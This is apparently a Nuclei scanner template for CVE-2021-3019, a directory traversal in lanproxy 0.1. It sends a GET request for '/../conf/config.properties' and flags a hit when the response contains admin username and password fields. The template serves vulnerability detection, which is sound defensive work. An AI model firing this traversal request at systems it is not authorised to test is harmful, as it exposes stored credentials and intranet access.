nuclei-templates/cves/2021/CVE-2021-3019.yaml

34 lines
856 B
YAML
Raw Normal View History

2021-01-30 12:22:35 +00:00
id: CVE-2021-3019
info:
name: Lanproxy Directory Traversal
author: pikpikcu
severity: medium
2021-03-24 06:48:11 +00:00
description: ffay lanproxy 0.1 allows Directory Traversal to read /../conf/config.properties to obtain credentials for a connection to the intranet.
reference: |
- https://github.com/ffay/lanproxy/commits/master
- https://github.com/maybe-why-not/lanproxy/issues/1
2021-03-18 07:54:36 +00:00
tags: cve,cve2021,lanproxy,lfi
2021-01-30 12:22:35 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/../conf/config.properties"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "application/octet-stream"
condition: and
part: header
- type: word
words:
- "config.admin.username"
- "config.admin.password"
condition: and
part: body